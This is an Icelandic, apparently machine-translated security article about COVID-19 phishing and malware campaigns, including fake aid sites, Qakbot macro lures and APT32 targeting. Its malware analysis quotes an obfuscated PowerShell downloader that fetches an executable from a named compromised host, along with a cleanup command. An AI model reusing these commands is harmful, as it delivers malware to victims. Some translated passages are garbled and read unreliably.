Árásarmenn halda áfram að nýta sér COVID-19 umræðuefnið og skapa sífellt fleiri ógnir fyrir notendur sem hafa mikinn áhuga á öllu sem tengist faraldri. IN Við höfum þegar talað um hvaða tegundir spilliforrita komu fram í kjölfar kransæðavírussins og í dag munum við tala um félagslega verkfræðitækni sem notendur í mismunandi löndum, þar á meðal Rússlandi, hafa þegar kynnst. Almennar stefnur og dæmi eru undir högg að sækja.
Mundu inn Við ræddum um þá staðreynd að fólk væri tilbúið að lesa ekki aðeins um kransæðaveiruna og faraldurinn, heldur einnig um fjárhagsaðstoð? Hér er gott dæmi. Áhugaverð veiðiárás fannst í þýska fylkinu North Rhine-Westphalia eða NRW. Árásarmennirnir bjuggu til afrit af vefsíðu efnahagsráðuneytisins (), þar sem hver sem er getur sótt um fjárhagsaðstoð. Slíkt forrit er í raun til og það reyndist vera gagnlegt fyrir svindlara. Eftir að hafa fengið persónulegar upplýsingar um fórnarlömb þeirra sóttu þeir um á vefsíðu ráðuneytisins, en tilgreindu aðrar bankaupplýsingar. Samkvæmt opinberum gögnum voru 4 þúsund slíkar falsaðar beiðnir gerðar þar til kerfið uppgötvaðist. Fyrir vikið féllu 109 milljónir dollara, ætlaðar borgurum sem verða fyrir áhrifum, í hendur svikara.
Viltu fá ókeypis próf fyrir COVID-19?
Annað markvert dæmi um veiðar með kransæðaveirum var í tölvupóstum. Skilaboðin vöktu athygli notenda með tilboði um að gangast undir ókeypis próf fyrir kransæðaveirusýkingu. Í fylgiskjali þessara það voru dæmi um Trickbot/Qakbot/Qbot. Og þegar þeir sem vildu athuga heilsu sína fóru að „fylla út meðfylgjandi eyðublað“ var illgjarnt forskrift hlaðið niður á tölvuna. Og til að forðast sandkassaprófanir byrjaði handritið að hlaða niður aðalvírusnum aðeins eftir nokkurn tíma, þegar verndarkerfin voru sannfærð um að engin illgjarn virkni myndi eiga sér stað.
Það var líka auðvelt að sannfæra flesta notendur um að virkja fjölvi. Til þess var venjulegt bragð notað: til að fylla út spurningalistann þarftu fyrst að virkja fjölvi, sem þýðir að þú þarft að keyra VBA skriftu.
Eins og þú sérð er VBA handritið sérstaklega dulið frá vírusvörnum.
Windows er með biðaðgerð þar sem forritið bíður /T <sekúndur> áður en það samþykkir sjálfgefið „Já“ svar. Í okkar tilviki beið handritið í 65 sekúndur áður en tímabundnum skrám var eytt:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Og á meðan beðið var var malware hlaðið niður. Sérstakt PowerShell handrit var hleypt af stokkunum fyrir þetta:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Eftir að hafa afkóðuð Base64 gildið, hleður PowerShell handritinu niður bakdyrinu sem staðsett er á vefþjóninum sem áður var hakkað frá Þýskalandi:
http://automatischer-staubsauger.com/feature/777777.pngog vistar það undir nafninu:
C:UsersPublictmpdirfile1.exe
Mappa ‘C:UsersPublictmpdir’ er eytt þegar 'tmps1.bat' skráin sem inniheldur skipunina er keyrð cmd /c mkdir ""C:UsersPublictmpdir"".
Markviss árás á ríkisstofnanir
Að auki greindu FireEye sérfræðingar nýlega frá markvissri APT32 árás sem stefnt var að stjórnvöldum í Wuhan, sem og kínverska neyðarstjórnunarráðuneytinu. Einn af dreifðu RTFs innihélt tengil á New York Times grein sem ber yfirskriftina . Hins vegar, við lestur hennar, var spilliforritum hlaðið niður (FireEye sérfræðingar greindu tilvikið sem METALJACK).
Athyglisvert er að við uppgötvun greindi enginn vírusvarnarefni þetta tilvik, samkvæmt Virustotal.
Þegar opinberar vefsíður liggja niðri
Mest sláandi dæmið um vefveiðarárás átti sér stað í Rússlandi um daginn. Ástæða þess var skipun langþráðra bóta fyrir börn á aldrinum 3 til 16 ára. Þegar tilkynnt var um upphaf móttöku umsókna þann 12. maí 2020, hlupu milljónir á vefsíðu Ríkisþjónustunnar til að fá langþráða hjálp og felldu gáttina ekki verri en fagleg DDoS árás. Þegar forsetinn sagði að „Ríkisþjónustan gæti ekki ráðið við flæði umsókna,“ byrjaði fólk að tala á netinu um að opna aðra síðu til að samþykkja umsóknir.
Vandamálið er að nokkrar síður byrjuðu að virka í einu, og á meðan ein, sú raunverulega á posobie16.gosuslugi.ru, tekur í raun við umsóknum, meira .
Samstarfsmenn frá SearchInform fundu um 30 ný svikalén á .ru svæðinu. Infosecurity og Softline Company hafa fylgst með meira en 70 svipuðum fölsuðum ríkisþjónustuvefsíðum síðan í byrjun apríl. Höfundar þeirra vinna með kunnugleg tákn og nota einnig samsetningar af orðunum gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, og svo framvegis.
Hype og félagsverkfræði
Öll þessi dæmi staðfesta aðeins að árásarmenn hafa tekist að afla tekna af efni kórónavírus. Og því meiri sem félagsleg spenna er og því óljósari mál, því meiri líkur hafa svindlarar á að stela mikilvægum gögnum, neyða fólk til að gefa upp peningana sína á eigin spýtur eða einfaldlega hakka fleiri tölvur.
Og í ljósi þess að heimsfaraldurinn hefur neytt hugsanlega óundirbúið fólk til að vinna að heiman í massavís, eru ekki aðeins persónuleg, heldur einnig fyrirtækjagögn í hættu. Til dæmis voru nýlega Microsoft 365 (áður Office 365) notendur einnig fyrir veðveiðum. Fólk fékk gríðarleg „misst“ raddskilaboð sem viðhengi við bréf. Hins vegar voru skrárnar í raun HTML síða sem sendi fórnarlömb árásarinnar á . Þar af leiðandi missir aðgangur og skerðir öll gögn af reikningnum.
Heimild: www.habr.com